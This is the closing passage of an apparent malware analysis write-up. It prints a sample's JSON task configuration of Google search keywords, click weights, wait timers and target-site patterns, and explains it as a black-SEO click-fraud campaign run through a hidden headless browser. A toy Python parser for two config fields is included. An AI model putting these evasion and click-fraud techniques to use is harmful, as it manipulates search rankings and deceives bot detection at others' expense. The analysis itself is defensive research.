    "keywords": ["plus size swimwear", "plus size dresses", "plus size bathing suits", "plus size swimsuits"],
    "max_page_turns": 10,
    "random_clicks_per_page": ["1:90", "2:10"],
    "link_wait_time": ["388", "1000"],
    "match_links": ["*bloomchic.com/*"]
  },
  {
    "action": "google",
    "keywords": ["Semi Auto Hot Foil Stamping Machine", "hot stamping machine", "automatic silk screen press", "best silk screen machine"],
    "max_page_turns": 10,
    "random_clicks_per_page": ["1:60", "2:40"],
    "link_wait_time": ["390", "1100"],
    "match_links": ["*.cn-superfine.com/*"]
  },
  {
    "action": "google",
    "keywords": ["plus size summer dresses", "plus size swim", "plus size women's clothing", "plus size clothes", "plus size swimwear for women"],
    "max_page_turns": 10,
    "random_clicks_per_page": ["1:60", "2:40"],
    "link_wait_time": ["300", "2300"],
    "match_links": ["*bloomchic.com/*"]
  },
  {
    "action": "google",
    "keywords": ["silk screen printing machine automatic", "cosmetics printing machines", "hot foil stamping equipment"],
    "max_page_turns": 10,
    "random_clicks_per_page": ["2:70", "3:30"],
    "link_wait_time": ["300", "3000"],
    "match_links": ["*www.cn-superfine.com/*"]
  },
  {
    "action": "wait",
    "description": "random wait 10000 - 60000 seconds",
    "wait_time": "800,4000"
  }
]

That is ... something? Needless to say, that was not exactly what we were expecting to see at this stage of the infection chain. Especially after so many convoluted steps! Still, we now have enough information to make an educated guess.

Conclusion

Renaud: From this point, what this malware is really up to can be inferred relatively safely. The malware is a go-rod-based invisible browser that gets its browse commands from the website hxxps://git.temp-xy.com. According to the JSON config dictionary above, several Google searches are performed, using some (very) specific keywords. When a specific website is spotted inside the result list, its link gets clicked.

By using several sleep timers and randomising some of the actions, the malware tries to pass off its activity as human activity (and thus avoid google bot-detection heuristics). All this together points toward a black SEO campaign. See, the more (human) users are clicking on a website for a given search query, the more weight is given to this website by google for this search. Do this at a large scale, and you can boost the position of any website in the search results relatively easily.
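To illustrate how such a task could be consumed, here is a toy interpreter for two of the fields. We did not reverse the Golang code that handles them, so the semantics are guesses: we read "random_clicks_per_page" entries as "count:weight" pairs (e.g. 1 click with weight 90, 2 clicks with weight 10) and "match_links" as shell-style wildcards. All function names and the example URLs are ours.

```python
import fnmatch
import random

def parse_click_weights(entries):
    """["1:90", "2:10"] -> ([1, 2], [90, 10]) (assumed count:weight format)."""
    counts, weights = [], []
    for entry in entries:
        count, weight = entry.split(":")
        counts.append(int(count))
        weights.append(int(weight))
    return counts, weights

def pick_click_count(entries, rng=random):
    """Draw a number of clicks according to the assumed weights."""
    counts, weights = parse_click_weights(entries)
    return rng.choices(counts, weights=weights, k=1)[0]

def is_target(url, patterns):
    """True if the search result URL matches one of the wildcard patterns."""
    return any(fnmatch.fnmatchcase(url.lower(), p.lower()) for p in patterns)

task = {
    "random_clicks_per_page": ["1:90", "2:10"],
    "match_links": ["*bloomchic.com/*"],
}
print(is_target("https://www.bloomchic.com/collections/swimwear", task["match_links"]))
print(is_target("https://www.example.com/plus-size", task["match_links"]))
print(pick_click_count(task["random_clicks_per_page"], random.Random(0)))
```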

As for why such a convoluted infection chain was used for such a simple piece of "malware", your guess is as good as ours. But we're not in the XXL swimsuit industry after all.